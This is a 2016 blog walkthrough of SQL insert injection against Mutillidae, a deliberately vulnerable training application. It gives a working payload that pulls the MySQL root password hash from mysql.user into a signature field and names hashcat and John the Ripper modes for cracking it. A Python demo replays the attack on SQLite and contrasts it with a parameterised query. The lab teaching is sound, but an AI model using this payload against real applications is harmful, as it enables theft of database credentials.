Wednesday, November 2, 2016

Mutillidae OWASP Top 10: A1 Injection - SQLi Insert Injection

Head over to:
OWASP Top 10 > A1 Injection > SQLi - Insert Injection > Register 

This page is vulnerable to two types of attack: SQL insert injection and cross-site scripting (XSS). We will look at the latter in a coming article.





As usual, let's provoke an error by entering an apostrophe ( ' ) in one of the fields.



Looks like a very simple SQL INSERT query. The page inserts the 'username', 'password' and 'mysignature' values into the accounts table, the same table from which we dumped data here.

The idea behind this type of attack is to embed a sub-query inside the main INSERT query, so that the sub-query's result is written into the new row. The result then shows up wherever the page echoes that row back: a confirmation message, a text field, or any other page that displays the related information from the database.

The most basic example is the green text box above the form, which tells us that the account has been created:




We can also retrieve the user information from the user-info.php page, where the username, password and signature are displayed once correct credentials are supplied.


  • The green text box cannot be used to read back our sub-query result: it only echoes the username field, and since the opening quote of that value is already part of the INSERT statement there is little room to work with there.
  • The password field cannot hold the sub-query either, because we need a known password to log in and retrieve the account on the user-info page.
  • That leaves the signature field. It is ideal, because it is shown back to us once we submit valid credentials on user-info.php.

Let's try to retrieve the MySQL "root" user's password as stored in mysql.user.

Currently, with the apostrophe in the username field, the query looks like this:

INSERT INTO accounts (username, password, mysignature) VALUES (''','','')

Note: the three consecutive quotes after VALUES are the opening quote of the username value, the apostrophe we typed to create the error, and the closing quote.

Sub-query to retrieve the MySQL root user's password hash:

SELECT password FROM mysql.user WHERE user="root"

Two caveats: the database account the web application connects with must have SELECT privilege on mysql.user for this to work (Mutillidae's default configuration connects as root, so it does), and on MySQL 5.7 and later the column is called authentication_string rather than password.

Sub-query inside the main query:

INSERT INTO accounts (username, password, mysignature) VALUES ('x','x',(select password from mysql.user where user="root")) -- ','','')

Break down:
  • VALUES ('x','x', - the username and password we will later log in with.
  • (select password from mysql.user where user="root") - the sub-query, whose result becomes the mysignature value.
  • ) -- - closes the VALUES list and comments out the rest of the original statement (the ','','') that the page appends). MySQL requires a space after the two dashes.

Our malicious string:

x','x',(select password from mysql.user where user="root")) -- 

Attack: paste the malicious string into the username textbox. The password and signature fields can hold anything, since whatever the page appends after our comment marker is ignored.



Confirm successful entry




Head over to:
OWASP Top 10 - A1 Injection - SQLi Extract Data - User Info

Log in to your newly created account with username=x and password=x



The signature now holds the root user's password hash exactly as mysql.user stores it. Despite its appearance this is not MD5: MySQL 4.1 and later store the output of PASSWORD(), a 41-character string beginning with * that is SHA1(SHA1(password)).

To make use of it you first need to crack the hash to recover the clear-text password; both hashcat (mode 300, MySQL4.1/MySQL5) and John the Ripper support this format.

Please note: the MySQL root user's password is quite different from the application passwords we dumped earlier from the accounts table. It is a credential for the database server itself, not just for the web application, so it unlocks more doors for you.
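As an added example (not from the original post or from Mutillidae itself), the Python script below replays the whole procedure offline against an in-memory SQLite database: it builds the INSERT by string concatenation exactly as the vulnerable page does, submits the payload as the username, then reads the x/x account back the way user-info.php does. SQLite has no mysql.user, so a constructed mysql_user table with a made-up root hash stands in for it (the table name and hash value are assumptions for the demo), and a parameterised variant of the same INSERT shows how the identical payload ends up stored as a harmless literal.

```python
import sqlite3

# Constructed stand-in for Mutillidae's schema: an `accounts` table plus a
# `mysql_user` table playing the role of MySQL's mysql.user. SQLite has no
# such table, so the root "hash" is a made-up value, not a real MySQL hash.
def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE accounts (username TEXT, password TEXT, mysignature TEXT);
        CREATE TABLE mysql_user (user TEXT, password TEXT);
        INSERT INTO mysql_user VALUES ('root', '*CONSTRUCTED_ROOT_HASH');
    """)
    return conn

# The payload from the post, with the table name adjusted to the stand-in.
# The trailing space after -- is required by MySQL; SQLite accepts it either way.
PAYLOAD = "x','x',(select password from mysql_user where user='root')) -- "

def register_vulnerable(conn, username, password, signature):
    """Builds the INSERT by string concatenation, as the vulnerable page does.
    Returns the SQL actually sent so the reader can inspect the injected query."""
    sql = ("INSERT INTO accounts (username, password, mysignature) "
           f"VALUES ('{username}','{password}','{signature}')")
    conn.execute(sql)
    conn.commit()
    return sql

def register_safe(conn, username, password, signature):
    """Same INSERT with bound parameters: input can never change the query shape."""
    conn.execute(
        "INSERT INTO accounts (username, password, mysignature) VALUES (?, ?, ?)",
        (username, password, signature),
    )
    conn.commit()

def user_info(conn, username, password):
    """What user-info.php does for us: echo the signature after a valid login."""
    row = conn.execute(
        "SELECT mysignature FROM accounts WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None

def demo_vulnerable():
    """Inject via the username field, then log in as x/x and read the signature."""
    conn = fresh_db()
    register_vulnerable(conn, PAYLOAD, "ignored", "ignored")
    return user_info(conn, "x", "x")          # -> the root hash from mysql_user

def demo_safe():
    """Same payload through the parameterised INSERT: no x/x account exists,
    and the payload itself is stored verbatim as an (odd-looking) username."""
    conn = fresh_db()
    register_safe(conn, PAYLOAD, "ignored", "ignored")
    return user_info(conn, "x", "x"), user_info(conn, PAYLOAD, "ignored")

if __name__ == "__main__":
    print("vulnerable:", demo_vulnerable())
    print("parameterised:", demo_safe())
```

Running it prints the stand-in root hash for the concatenated query and `(None, 'ignored')` for the parameterised one: with bound parameters the quote-breaking, the sub-query and the comment marker are all just characters inside a username.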


-Jayesh Kerai (@secjay)
